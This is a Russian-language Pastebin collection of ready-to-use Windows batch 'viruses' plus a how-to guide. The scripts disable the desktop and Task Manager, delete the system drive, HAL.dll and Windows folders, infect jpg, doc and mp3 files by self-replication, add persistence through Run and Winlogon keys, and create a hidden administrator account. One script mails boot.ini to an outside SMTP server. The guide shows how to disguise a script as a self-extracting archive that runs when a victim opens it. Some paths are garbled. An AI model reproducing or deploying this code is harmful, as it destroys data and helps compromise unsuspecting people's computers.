Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Оглавление
- Готовые bat вирусы 2
- Простенькие вирусы 2
- Убирает рабочий стол 2
- Выключается компьютер 2
- Перезагрузка компьютера 2
- Запрещает запускать программы 2
- Удаление дров 2
- Удаляет звуки Windows 2
- Запрещает заходить в панель управления 2
- Запрещает комбинацию Ctrl-Alt-Delete 3
- Меняет местами значение кнопок мыши 3
- Удаляет курсор мыши 3
- Меняет название корзины 3
- Убирает панель управления 3
- Серьезные вирусы 4
- Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя) 4
- Удаляет все файлы в program files 4
- Убивает процесс explorer.exe 4
- Создает миллион папок 4
- Удаляет все драйвера, которые установлены на компьютере 4
- Удаляет команду DEL 4
- Будет открывать бесконечно Пэинт 4
- Изменяет расширение всех ярлыков на .txt 4
- Заражает Autoexec 4
- Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить) 4
- сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать. 4
- Меняет местами кнопки мыши,но обратная смена не возможна) 4
- Удаляет ядро системы 4
- Заражает *.jpg *.mp3 *.doc *.htm? *.xls. (Заражает не только в текущем каталоге, но и надкаталоге) 5
- Вирус заражает *.JPG в текущем каталоге 5
- Жестокие вирусы 6
- У вашего ламера будет глючить компьютер. 6
- Вирус который убивает Винду. Не проверяйте на своем компьютере=) 7
- Вирус полностью блокирует систему при следующем запуске Windows. Даже в безопасном режиме, выключает диспетчер задач. Чтобы разблокировать компьютер можно введя код 200393! (Но он не разблокирует) 11
- Добавляет программу в автозагрузку ОС 12
- Создаем вирус 13
- Команды для BAT-файлов 15
- Готовые bat вирусы
- Здесь готовые Bat-вирусы. Просто вставляем код в bat файл и все, если не знаете как создать bat файл читаем тут
- Простенькие вирусы
- Убирает рабочий стол
- @echo off
- reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
- Выключается компьютер
- @echo off
- shutdown -s -t 1 -c "lol" >nul
- Перезагрузка компьютера
- @echo off
- shutdown -r -t 1 -c "lol" >nul
- Запрещает запускать программы
- @echo off
- reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
- Удаление дров
- @echo off
- del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul
- Удаляет звуки Windows
- @echo off
- del "%SystemRoot%\Media" /q >nul
- Запрещает заходить в панель управления
- @echo off
- reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
- /v NoControlPanel /t REG_DWORD /d 1 /f >nul
- Запрещает комбинацию Ctrl-Alt-Delete
- reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
- Меняет местами значение кнопок мыши
- %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
- Удаляет курсор мыши
- del "%SystemRoot%Cursors*.*" >nul
- Меняет название корзины
- reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F
- Убирает панель управления
- reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- Серьезные вирусы
- Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)
- rd [Буква_Диск]: /s /q
- Удаляет все файлы в program files
- del c:Program Files/q
- Убивает процесс explorer.exe
- taskkill /f /im explorer.exe >nul
- Создает миллион папок
- FOR /L %%i IN (1,1,1000000) DO md %%i
- Удаляет все драйвера, которые установлены на компьютере
- del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul
- Удаляет команду DEL
- del %0
- Будет открывать бесконечно Пэинт
- :x
- Start mspaint
- goto x
- Изменяет расширение всех ярлыков на .txt
- assoc .lnk=.txt
- Заражает Autoexec
- copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul
- reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul
- Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)
- @echo off
- chcp 1251
- net user SUPPORT_388945a0 /delete
- net user hacker hack /add
- net localgroup Администраторы hacker /add
- net localgroup Пользователи SUPPORT_388945a0 /del
- reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y
- сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
- rundll32 user,disableoemlayer
- Меняет местами кнопки мыши,но обратная смена не возможна)
- rundll32 user,SwapMouseButton
- Удаляет ядро системы
- del %systemroot%\system32\HAL.dll
- Заражает *.jpg *.mp3 *.doc *.htm? *.xls. (Заражает не только в текущем каталоге, но и надкаталоге)
- @echo off%[MrWeb]%
- if '%1=='In_ goto MrWebin
- if exist c:\MrWeb.bat goto MrWebru
- if not exist %0 goto MrWeben
- find "MrWeb"<%0>c:\MrWeb.bat
- attrib +h c:\MrWeb.bat
- :MrWebru
- for %%g in (..\*.jpg ..\*.doc ..\*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:\MrWeb In_ %%ggoto MrWeben
- :MrWebin
- if exist %2.bat goto MrWeben
- type c:\MrWeb.bat>>%2.bat
- echo start %2>>%2.bat%[MrWeb]%
- :MrWeben
- Вирус заражает *.JPG в текущем каталоге
- @echo off%[MrWeb]%
- if '%1=='In_ goto MrWebin
- if exist c:\MrWeb.bat goto MrWebru
- if not exist %0 goto MrWeben
- find "MrWeb"<%0>c:\MrWeb.bat
- attrib +h c:\MrWeb.bat
- :MrWebru
- for %%g in (*.jpg) do call c:\MrWeb In_ %%g
- goto MrWeben
- :MrWebin
- if exist %2.bat goto MrWeben
- type c:\MrWeb.bat>>%2.bat
- echo start %2>>%2.bat%[MrWeb]%
- :MrWeben
- Жестокие вирусы
- У вашего ламера будет глючить компьютер.
- @echo off
- echo Set fso = CreateObject("Scripting.FileSystemObject") > %systemdrive%\windows\system32\rundll32.vbs
- echo do >> %systemdrive%\windows\system32\rundll32.vbs
- echo Set tx = fso.CreateTextFile("%systemdrive%\windows\system32\rundll32.dat", True) >> %systemdrive%\windows\system32\rundll32.vbs
- echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs
- echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs
- echo FSO.DeleteFile "%systemdrive%\windows\system32\rundll32.dat" >> %systemdrive%\windows\system32\rundll32.vbs
- echo loop >> %systemdrive%\windows\system32\rundll32.vbs
- start %systemdrive%\windows\system32\rundll32.vbs
- reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /f
- Вирус который убивает Винду. Не проверяйте на своем компьютере=)
- @echo This virus created by LIZA
- @echo Virus: pcforumhack.ru™ Virus
- @echo Autor: LIZA
- @echo off
- echo Chr(39)>%temp%\temp1.vbs
- echo Chr(39)>%temp%\temp2.vbs
- echo on error resume next > %temp%\temp.vbs
- echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbs
- echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp.vbs
- reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0
- copy %¶§% %SystemRoot%\user32dll.bat
- reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
- echo fso.deletefile "C:\ntldr",1 >> %temp%\temp.vbs
- reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f
- reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
- reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f
- reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f
- echo fso.deletefolder "D:\Windows",1 >> %temp%\temp.vbs
- echo fso.deletefolder "I:\Windows",1 >> %temp%\temp.vbs
- echo fso.deletefolder "C:\Windows",1 >> %temp%\temp.vbs
- echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
- echo fso.deletefile sr+"\system32\hal.dll",1 >> %temp%\temp.vbs
- echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
- echo fso.deletefolder sr+"\system32\dllcache",1 >> %temp%\temp.vbs
- echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
- echo fso.deletefolder sr+"\system32\drives",1 >> %temp%\temp.vbs
- echo s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ru™">>%temp%\temp.vbs
- echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","forum.whack.ru™">>%temp%\temp.vbs
- echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","forum.whack.ru™">>%temp%\temp.vbs
- echo on error resume next > %temp%\temp1.vbs
- echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp1.vbs
- echo do>>%temp%\temp1.vbs
- echo fso.getfile ("A:\")>>%temp%\temp1.vbs
- echo loop>>%temp%\temp1.vbs
- echo on error resume next > %temp%\temp2.vbs
- echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp2.vbs
- echo do>>%temp%\temp2.vbs
- echo execute"S.Run ""%comspec% /c echo "" & Chr(7), 0, True">>%temp%\temp2.vbs
- echo loop>>%temp%\temp2.vbs
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
- reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
- echo set application=createobject("shell.application")>>%temp%\temp.vbs
- echo application.minimizeall>>%temp%\temp.vbs
- reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
- start rundll32 user32, SwapMouseButton
- reg add "HKCR\exefile\shell\open\command" /ve /t REG_SZ /d rundll32.exe /f
- echo i=50 >> %temp%\temp.vbs
- echo while i^>0 or i^<0 >> %temp%\temp.vbs
- echo S.popup "forum.whack.ru™",0, "forum.whack.ru™",0+16 >> %temp%\temp.vbs
- echo i=i-1 >> %temp%\temp.vbs
- echo wend >> %temp%\temp.vbs
- echo do >> %temp%\temp.vbs
- echo wscript.sleep 200 >> %temp%\temp.vbs
- echo s.sendkeys"{capslock}" >> %temp%\temp.vbs
- echo wscript.sleep 200 >> %temp%\temp.vbs
- echo s.sendkeys"{numlock}" >> %temp%\temp.vbs
- echo wscript.sleep 200 >> %temp%\temp.vbs
- echo s.sendkeys"{scrolllock}" >> %temp%\temp.vbs
- echo loop>> %temp%\temp.vbs
- echo Set oWMP = CreateObject("WMPlayer.OCX.7") >> %temp%\temp.vbs
- echo Set colCDROMs = oWMP.cdromCollection >> %temp%\temp.vbs
- echo if colCDROMs.Count ^>= 1 then >> %temp%\temp.vbs
- echo For i = 0 to colCDROMs.Count - 1 >> %temp%\temp.vbs
- echo colCDROMs.Item(i).eject >> %temp%\temp.vbs
- echo next >> %temp%\temp.vbs
- echo End If >> %temp%\temp.vbs
- echo Call SendPost("smtp.mail.ru", "forum.whack.ru™@mail.ru", "support@mail.ru", "...", "Копм заражен!") >> %temp%\temp.vbs
- echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\temp.vbs
- echo Set iMsg = CreateObject("CDO.Message") >> %temp%\temp.vbs
- echo Set iConf = CreateObject("CDO.Configuration") >> %temp%\temp.vbs
- echo Set Flds = iConf.Fields >> %temp%\temp.vbs
- echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 >> %temp%\temp.vbs
- echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 >> %temp%\temp.vbs
- echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "support" >> %temp%\temp.vbs
- echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "support" >> %temp%\temp.vbs
- echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru" >> %temp%\temp.vbs
- echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25 >> %temp%\temp.vbs
- echo Flds.Update >> %temp%\temp.vbs
- echo iMsg.Configuration = iConf >> %temp%\temp.vbs
- echo iMsg.To = strTo >> %temp%\temp.vbs
- echo iMsg.From = strFrom >> %temp%\temp.vbs
- echo iMsg.Subject = strSubject >> %temp%\temp.vbs
- echo iMsg.TextBody = strBody >> %temp%\temp.vbs
- echo iMsg.AddAttachment "c:\boot.ini" >> %temp%\temp.vbs
- echo iMsg.Send >> %temp%\temp.vbs
- echo End Function >> %temp%\temp.vbs
- echo Set iMsg = Nothing >> %temp%\temp.vbs
- echo Set iConf = Nothing >> %temp%\temp.vbs
- echo Set Flds = Nothing >> %temp%\temp.vbs
- echo s.run "shutdown -r -t 0 -c ""pcforumhack.ru™"" -f",1 >> %temp%\temp.vbs
- start %temp%\temp.vbs
- start %temp%\temp1.vbs
- start %temp%\temp2.vbs
- Вирус полностью блокирует систему при следующем запуске Windows. Даже в безопасном режиме, выключает диспетчер задач. Чтобы разблокировать компьютер можно введя код 200393! (Но он не разблокирует)
- @echo off
- CHCP 1251
- cls
- Set Yvaga=На вашем компьютере найден вирус.
- Set pass=Пароль
- Set pas=Введите пароль.
- Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль
- Set dim=Выключаю вирус...
- title Внимание!!!
- CHCP 866
- IF EXIST C:\windows\boot.bat (
- goto ok )
- cls
- IF NOT EXIST C:\windows\boot.bat (
- ECHO Windows Registry Editor Version 5.00 >> C:\0.reg
- ECHO. >> C:\0.reg
- ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> C:\0.reg
- ECHO. >> C:\0.reg
- ECHO "Shell"="Explorer.exe, C:\\windows\\boot.bat " >> C:\0.reg
- start/wait regedit -s C:\0.reg
- del C:\0.reg
- ECHO @echo off >>C:\windows\boot.bat
- ECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe >>C:\windows\boot.bat
- ECHO reg add "HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system" /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:\windows\boot.bat
- ECHO start sys.bat >>C:\windows\boot.bat
- attrib +r +a +s +h C:\windows\boot.bat
- copy virus.bat c:\windows\sys.bat
- attrib +r +a +s +h C:\windows\sys.bat
- GOTO end)
- :ok
- cls
- Echo %Yvaga%
- echo.
- echo %virus%
- echo %pas%
- set /a choise = 0
- set /p choise=%pass%:
- if "%choise%" == "101" goto gold
- if "%choise%" == "200393" goto status
- exit
- :status
- echo %dim%
- attrib -r -a -s -h C:\windows\boot.bat
- del C:\windows\boot.bat
- attrib -r -a -s -h C:\windows\sys.bat
- del C:\windows\sys.bat
- cls
- :gold
- start C:\
- :end
- Добавляет программу в автозагрузку ОС
- copy ""%0"" "%SystemRoot%\system32\File.bat"
- reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f
- reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
- Этот вирус,блокирует все программы,но интернет работает.
- @Echo off
- Echo Virus Loading
- Date 13.09.96
- If exist c:ski.bat goto abc
- Copy %0 c:ski.bat
- Attrib +h c:ski.bat
- Echo c:ski.bat >>autoexec.bat
- :abc
- md PRIDUROK
- md LUZER
- md DURAK
- md LAMER
- Label E: PRIDUROK
- assoc .exe=.mp3
- del c:Program Files/q
- Echo VIRUS LOAD
- Создаем вирус
- В этой статье мы научимся создавать вредоносные программки, что-то вроде вируса. Где мы будем использовать штатные средства Windows.
- И так начнём:
- Для начала нам надо создать Текстовый документ.txt
- Правой кнопкой мыши по рабочему столу, дальше "создать" и выбираем "Текстовый документ"
- Открываем его, дальше нам надо забить в него команды bat файлов
- Примеры ниже:
- %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul – Поменять местами значения кнопок мыши
- reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies ExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul – Делает невозможным запуск приложений
- time 0:00 >nul – Поставить время на 00:00
- reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul – Запретить редактирование реестра вручную
- del "%SystemRoot%Cursors*.*" >nul – Удалить курсор мыши
- del "%SystemRoot%Media" /q >nul – Удалить системные звуки Windows
- reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul – Запретить вызов панели управления
- reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul – Убрать рабочий стол
- shutdown -r -t 1 -c "lol" -f >nul – Форсированная перезагрузка ПК
- shutdown -s -t 1 -c "lol" -f >nul – Форсированное выключение ПК
- taskkill /f /im explorer.exe >nul – Убить процесс Explorer.exe
- net share "ResName"="C:" >nul – Расшарить диск C:
- label C:Диск >nul – Переименовать диск С:
- msg * "Текст сообщения" >nul – Показать Windows-стилизованное сообщение с кнопкой ОК
- del "%0" >nul – Самоликвидация вирус
- Давайте мы попробуем поменять местами значения кнопок мыши, напишем в текстовом документе.txt это:
- %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
- Сохраняем, и чтобы команда заработала нам надо переименовать "Текстовый документ.txt" вместо txt пишем bat, у нас должно получится вот так "Текстовый документ.bat" (Без кавычек)
- Вот и все небольшой простенький вредоносный вирус создан.
- Если хотите убедиться,что вирус создан открываем Текстовый документ.bat
- И радуемся)) Если хотите вернуть местами кнопки мыши, то
- Заходим в Панель управления заходите в файл под названием "Мышь"
- Убираем галочку где написано "обменять назначение кнопок», нажимаете применить. Вот и все.
- Если хотите пошутить над другом или подкинуть вирус то делаем так:
- Ваш созданный вирус bat добавляем в архив, надеюсь все знают, как это делается. Правой кнопкой мыши на файле и добавить в архив.
- Мы зашли в "Имя и Параметры архива», ставим галочку где написано "Создать SFX-архив"
- Потом заходим "Дополнительно" дальше в "Параметры SFX..."
- Где написано "Выполнить после распаковки «пишем НАЗВАНИЕ вашего bat файла, например, если у вас название вашего bat файла "Текстовый документ.bat" то в поле "Выполнить после распаковки" пишем Текстовый документ.bat
- И теперь если открыть вот этот наш архив (вирус), надо нажать "Извлечь», и вирус автоматический сработает.
- Команды для BAT-файлов
- Это команды, которые используются для BAT файлов.
- Ну в общем так сказать, для написания вирусов.
- ASSOC - Отображает или модифицирует связи расширений файлов
- AT - Планирует команды и программы для выполнения на компьютере.
- ATTRIB - Отображает или изменяет атрибуты файла.
- BREAK - Устанавливает или отменяет проверку комбинации [Ctrl+C].
- CACLS - Отображает или модифицирует списки управления доступом (ACLs) для файлов.
- CALL - Вызывает один *.BAT-файл из другого.
- CD - Отображает имя или изменяет имя текущей директории.
- CHCP - Отображает или устанавливает номер активной кодовой страницы.
- CHDIR - Отображает имя или изменяет имя текущей директории.
- CHKDSK - Проверяет диск и отображает отчет о состоянии.
- CLS - Очищает экран.
- CMD - Стартует новый экземпляр интерпретатора команд Windows NT.
- COLOR - Устанавливает цвета по умолчанию для переднего и заднего плана консоли.
- COMMAND - Стартует новую копию интерпретатора команд Windows.
- COMP - Сравнивает содержимое двух файлов или установки файлов.
- COMPACT - Отображает или видоизменяет сжатие файлов на патрициях Windows NT(NTFS).
- CONVERT - Конвертирует FAT томов к формату файловой системы Windows NT(NTFS). Вы не можете конвертировать текущий диск.
- COPY - Копирует один или больше файлов на другое место.
- CTTY - Изменяет терминальное устройство, используемое для управления вашей системой.
- DATE - Отображает или устанавливает дату.
- DEL - Удаляет один или более файлов.
- DEBUG - Выполняет отладку, тестирование программ и редактирование инструментальных средств.
- DIR - Отображает список файлов и поддиректорий в директории.
- DISKCOMP - Сравнивает содержимое двух дискет.
- DISKCOPY - Копирует содержимое одной дискеты на другую.
- DOSKEY - Редактирует командные строки, восстанавливает команды Windows и создает макрос.
- ECHO - Отображает сообщения, или включает/выключает вывод команд.
- EMM386 - Включает/выключает поддержку расширенной памяти EMM386.
- ENDLOCAL - Заканчивает локализацию изменений окружающей среды в *.BAT-файле.
- ERASE - Удаляет один или более файлов.
- EXIT - Прекращает выполнение программы (интерпретатор команд).
- EXTRACT - Средство извлечения информации из CAB - файлов.
- FC - Сравнивает два файла или установки файлов, и отображает различие между ними.
- FIND - Ищет текстовую строку в файле или файлах.
- FINDSTR - Поиск строк в файлах.
- FOR - Выполняет указанную команду для каждого файла в наборе файлов.
- FORMAT - Форматирует диск для использования с Windows.
- FTYPE - Отображает или модифицирует типы файлов, используемых в связях расширений.
- GOTO - Направляет интерпретатор команд Windows NT к помеченной строке в *.BAT-файле.
- GRAFTABL - Способность Windows отображать символы псевдографики, вставленные в графическом режиме.
- HELP - Обеспечивает информацию Help для команд Windows.
- IF - Выполняет обработку условия в *.BAT-файле.
- KEYB - Конфигурирует клавиатуру для заданного языка.
- LABEL - Создает, изменяет, или удаляет метку тома на диске.
- LOADHIGH(LH) - Загружает программу в верхние адреса памяти.
- MD - Создает директорию.
- MEM - Отображает величину используемой и свободной памяти в вашей системе.
- MKDIR - Создает директорию.
- MODE - Конфигурирует системное устройство.
- MORE - Отображает вывод одного экрана за раз.
- MOVE - Перемещает один или более файлов из одной директории в другую на том же диске.
- NETSTAT - Отображает статистики протоколов и текущих сетевых соединений TCP/IP.
- NLSFUNC - Загружает информацию, специфическую для страны.
- PATH - Отображает или устанавливает путь поиска для выполняемых файлов.
- PAUSE - Приостанавливает обработку *.BAT-файла и отображает сообщение.
- POPD - Восстанавливает предыдущее значение текущей директории, сохраненной по PUSHD.
- PRINT - Печатает текстовый файл.
- PROMPT - Изменяет подсказку к командам Windows.
- PUSHD - Сохраняет текущую директорию, потом изменяет.
- RD - Удаляет директорию.
- RECOVER - Восстанавливает читаемую информацию с плохого или дефектного диска.
- REM - Записывает комментарии (примечания) в *.BAT-файлы или CONFIG.SYS.
- REN - Переименует файл или файлы.
- RENAME - Переименует файл или файлы.
- REPLACE - Заменяет файлы.
- RESTORE - Восстанавливает файлы, которые были архивированы с использованием команды BACKUP.
- RMDIR - Удаляет директорию.
- SET - Отображает, устанавливает или удаляет переменные среды Windows.
- SETLOCAL - Начинает локализацию изменений среды в *.BAT-файле.
- SETVER - Устанавливает номер версии MS-DOS, который Windows сообщает программе.
- SHIFT - Сдвигает позицию замещаемых параметров в *.BAT-файле.
- SMARTDRV - Инсталлирует и конфигурирует утилиту кэширования диска SMART - драйва.
- SORT - Сортирует входной поток.
- START - Стартует отдельное окно для выполнения указанной программы или команды.
- SUBST - Связывает путь с литерой диска.
- SYS - Копирует файлы системы MS-DOS и интерпретатор команд на указанный вами диск.
- TIME - Отображает или устанавливает системное время.
- TITLE - Устанавливает заголовок окна для сеанса.
- TREE - Графически отображает структуру директория в драйве или путь.
- TYPE - Отображает содержимое текстового файла.
- VER - Отображает версию Windows.
- VERIFY - Сообщает Windows, проверять ли правильность записи файлов на диск.
- VOL - Отображает метку дискового тома и серийный номер.
- XCOPY - Копирует файлы и деревья директории.
- 1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement